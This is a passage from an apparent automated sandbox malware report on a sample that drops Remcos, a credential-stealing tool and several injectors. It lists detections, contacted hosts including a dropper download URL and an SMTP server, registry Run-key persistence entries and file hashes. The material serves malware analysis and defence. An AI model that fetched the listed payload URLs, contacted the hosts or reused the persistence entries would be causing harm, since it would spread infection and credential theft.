                    40.2.5.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    44.2.Windows Update.exe.4ab0000.13.unpack100%AviraTR/Inject.vcoldiDownload File
                    35.0.dwn.exe.4031bf.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                    29.0.bin.exe.d0000.0.unpack100%AviraTR/Redcap.ghjptDownload File
                    3.2.bin.exe.d0000.0.unpack100%AviraTR/Redcap.ghjptDownload File
                    33.1.remcos.exe.400000.0.unpack100%AviraHEUR/AGEN.1119333Download File
                    35.2.dwn.exe.4031bf.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                    40.0.5.exe.400000.4.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.0.5.exe.400000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    44.0.Windows Update.exe.400000.9.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.0.Windows Update.exe.400000.9.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    41.0.4.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File
                    2.1.xxTzyGLZx5.exe.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
                    2.1.xxTzyGLZx5.exe.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
                    40.2.5.exe.415058.3.unpack100%AviraTR/Inject.vcoldiDownload File
                    40.1.5.exe.415058.3.unpack100%AviraTR/Inject.vcoldiDownload File
                    44.0.Windows Update.exe.400000.5.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.0.Windows Update.exe.400000.5.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    44.0.Windows Update.exe.415058.12.unpack100%AviraTR/Inject.vcoldiDownload File
                    44.2.Windows Update.exe.3883258.7.unpack100%AviraTR/Inject.vcoldiDownload File
                    40.2.5.exe.48e0000.14.unpack100%AviraTR/Inject.vcoldiDownload File
                    40.0.5.exe.415058.11.unpack100%AviraTR/Inject.vcoldiDownload File
                    37.2.5.exe.148f0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    41.0.4.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    44.0.Windows Update.exe.400000.4.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    44.0.Windows Update.exe.400000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    2.2.xxTzyGLZx5.exe.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
                    2.2.xxTzyGLZx5.exe.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
                    43.2.Windows Update.exe.147a0000.4.unpack100%AviraTR/Inject.vcoldiDownload File
                    39.2.21.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                    40.0.5.exe.400000.8.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    40.0.5.exe.400000.8.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    41.2.4.exe.2520000.4.unpack100%AviraTR/Spy.Gen8Download File
                    31.2.remcos.exe.400000.0.unpack100%AviraHEUR/AGEN.1116566Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://hotmarzz.eu/goods/Droppertodownloa.exe4%VirustotalBrowse
                    https://hotmarzz.eu/goods/Droppertodownloa.exe0%Avira URL Cloudsafe
                    http://hotmarzz.eu/goods/Droppertodownloa.exem0%Avira URL Cloudsafe
                    http://hotmarzz.eu/goods/Droppertodownloa.exeOZ0%Avira URL Cloudsafe
                    https://support.google.0%Avira URL Cloudsafe
                    http://stascorp.comDVarFileInfo$0%Avira URL Cloudsafe
                    http://hotmarzz.eu/goods/Droppertodownloa.exeW0%Avira URL Cloudsafe
                    https://hotmarzz.eu/goods/Droppertodownloa.exej0%Avira URL Cloudsafe
                    http://hotmarzz.eu/goods/Droppertodownloa.exe0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    whatismyipaddress.com
                    		104.16.154.36
                    		truefalse
                      		high
                      hotmarzz.eu
                      		195.110.124.154
                      		truefalse
                        		high
                        smtp.privateemail.com
                        		66.29.159.53
                        		truefalse
                          		high
                          216.47.6.0.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://hotmarzz.eu/goods/Droppertodownloa.exefalse
                            • 4%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://whatismyipaddress.com/false
                              		high
                              http://hotmarzz.eu/goods/Droppertodownloa.exefalse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmpfalse
                                		high
                                https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=httpsremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                  		high
                                  https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kremcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                    		high
                                    https://support.google.com/chrome/answer/6258784bin.exe, 00000003.00000002.944699333.00000000046E0000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.944739806.00000000046FD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845361008.00000000046FD000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.google.com/?gws_rd=sslremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                        		high
                                        https://www.google.com/searchremcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                          		high
                                          https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                            		high
                                            http://hotmarzz.eu/goods/Droppertodownloa.exembin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmpfalse
                                              		high
                                              https://support.google.com/chrome/?p=plugin_flashbin.exe, 00000003.00000002.944699333.00000000046E0000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.944739806.00000000046FD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845361008.00000000046FD000.00000004.00000001.sdmpfalse
                                                		high
                                                https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://hotmarzz.eu/goods/Droppertodownloa.exeOZbin.exe, 00000003.00000003.706516335.0000000000D61000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nirsoft.netremcos.exe, 0000001F.00000002.756308956.0000000000193000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://support.google.remcos.exe, 0000001F.00000002.756957465.0000000002229000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nsis.sf.net/NSIS_ErrorErrorxxTzyGLZx5.exe, 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp, xxTzyGLZx5.exe, 00000001.00000000.660567886.0000000000409000.00000008.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000000.666223896.0000000000409000.00000008.00020000.sdmp, dwn.exe, 00000023.00000000.746840161.0000000000403000.00000002.00020000.sdmpfalse
                                                      		high
                                                      https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://support.google.com/chrome/?p=plugin_javaremcos.exe, 0000001F.00000003.752021743.000000000222A000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://www.google.com/favicon.icoremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.msn.com/de-ch/?ocid=iehpremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crremcos.exe, 0000001F.00000003.749076522.000000000222E000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749491451.000000000222E000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://stascorp.comDVarFileInfo$bin.exe, 00000003.00000003.834239549.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.710177902.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706849187.0000000000D94000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833594602.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706749512.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.707065597.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706915581.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.837896441.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706804145.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840339214.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840815715.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833909279.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845234590.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.720653514.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.932808488.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.709580311.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.837181130.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706772725.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833790621.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.834673194.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.707076421.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706791322.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706882027.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833519937.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.834003178.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.720698264.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706821542.0000000000DC0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845559560.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.710039428.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.709560738.0000000000D85000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		low
                                                                    http://nsis.sf.net/NSIS_ErrorxxTzyGLZx5.exe, xxTzyGLZx5.exe, 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp, xxTzyGLZx5.exe, 00000001.00000000.660567886.0000000000409000.00000008.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000000.666223896.0000000000409000.00000008.00020000.sdmp, dwn.exe, 00000023.00000000.746840161.0000000000403000.00000002.00020000.sdmpfalse
                                                                      		high
                                                                      http://service.real.com/realplayer/security/02062012_player/en/remcos.exe, 0000001F.00000003.752013552.0000000002255000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.752875827.0000000002255000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsremcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/intl/en_uk/chrome/remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.msn.com/?ocid=iehpremcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://consent.google.com/set?pc=s&uxe=4421591remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://hotmarzz.eu/goods/Droppertodownloa.exeWbin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.nirsoft.net/remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://github.com/syohex/java-simple-mine-sweeperC:xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000003.680946266.0000000000805000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000003.682059201.00000000007CD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, bin.exe, 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, bin.exe, 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, bin.exe, 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, bin.exe, 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, bin.exe, 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, bin.exe, 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://hotmarzz.eu/goods/Droppertodownloa.exejremcos.exe, 0000000D.00000003.753230553.00000000006E9000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000002.936555212.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://support.google.com/premcos.exe, 0000001F.00000002.756957465.0000000002229000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&remcos.exe, 0000001F.00000003.749076522.000000000222E000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749491451.000000000222E000.00000004.00000001.sdmpfalse
                                                                                              		high

                                                                                              Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              104.16.154.36
                                                                                              		whatismyipaddress.comUnited States
                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                              185.157.161.174
                                                                                              		unknownSweden
                                                                                              		197595OBE-EUROPEObenetworkEuropeSEtrue
                                                                                              195.110.124.154
                                                                                              		hotmarzz.euItaly
                                                                                              		39729REGISTER-ASITfalse
                                                                                              66.29.159.53
                                                                                              		smtp.privateemail.comUnited States
                                                                                              		19538ADVANTAGECOMUSfalse
                                                                                              81.88.52.165
                                                                                              		unknownItaly
                                                                                              		39729REGISTER-ASITfalse

                                                                                              Private

                                                                                              IP
                                                                                              192.168.2.1
                                                                                              127.0.0.1

                                                                                              General Information

                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                              Analysis ID:535501
                                                                                              Start date:07.12.2021
                                                                                              Start time:13:37:38
                                                                                              Joe Sandbox Product:CloudBasic
                                                                                              Overall analysis duration:0h 16m 8s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Sample file name:xxTzyGLZx5.exe
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                              Number of analysed new started processes analysed:47
                                                                                              Number of new started drivers analysed:3
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • HDC enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Detection:MAL
                                                                                              Classification:mal100.phis.troj.spyw.expl.evad.winEXE@62/52@12/7
                                                                                              EGA Information:Failed
                                                                                              HDC Information:
                                                                                              • Successful, ratio: 32.1% (good quality ratio 28.7%)
                                                                                              • Quality average: 72.7%
                                                                                              • Quality standard deviation: 33.2%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 53%
                                                                                              • Number of executed functions: 41
                                                                                              • Number of non-executed functions: 313
                                                                                              Cookbook Comments:
                                                                                              • Adjust boot time
                                                                                              • Enable AMSI
                                                                                              • Found application associated with file extension: .exe
                                                                                              Warnings:
                                                                                              Show All
                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 20.50.102.62, 204.79.197.222, 20.82.209.183, 52.182.143.212, 20.82.210.154, 20.54.110.249, 40.91.112.76
                                                                                              • Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, a-0019.a-msedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, 1.perf.msedge.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              13:38:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run logsmustcome "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                              13:38:51API Interceptor879x Sleep call for process: cmd.exe modified
                                                                                              13:38:52API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                              13:38:54AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Images C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              13:39:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run logsmustcome "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                              13:39:35API Interceptor109x Sleep call for process: 21.exe modified
                                                                                              13:39:46API Interceptor308x Sleep call for process: 4.exe modified
                                                                                              13:39:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run itswell C:\Users\user\AppData\Roaming\itswell\itswell.exe
                                                                                              13:40:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run itswell C:\Users\user\AppData\Roaming\itswell\itswell.exe
                                                                                              13:40:14API Interceptor6x Sleep call for process: Windows Update.exe modified
                                                                                              13:40:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                              13:40:24API Interceptor1x Sleep call for process: dw20.exe modified
                                                                                              13:40:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              No context

                                                                                              Domains

                                                                                              No context

                                                                                              ASN

                                                                                              No context

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Program Files\Microsoft DN1\rdpwrap.ini
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):222441
                                                                                              Entropy (8bit):5.28370530508163
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:uEUfZFsTR0poD+X8f/qG65wgP100JJRWDCUlnKxbBHq1I517t/0A5ff4n+mmyIfd:uyIfgteoLwoIvxZ3779Zsoug
                                                                                              MD5:C5CA0F44F8913EB6055EBA91DACE5B48
                                                                                              SHA1:1318135EF55431DAC0654DE3989446703E7BE252
                                                                                              SHA-256:FB54DC1E345193DBE8AAADC8DC4CD68C6321C7701F5F732D6EEA3605E1B11B7B
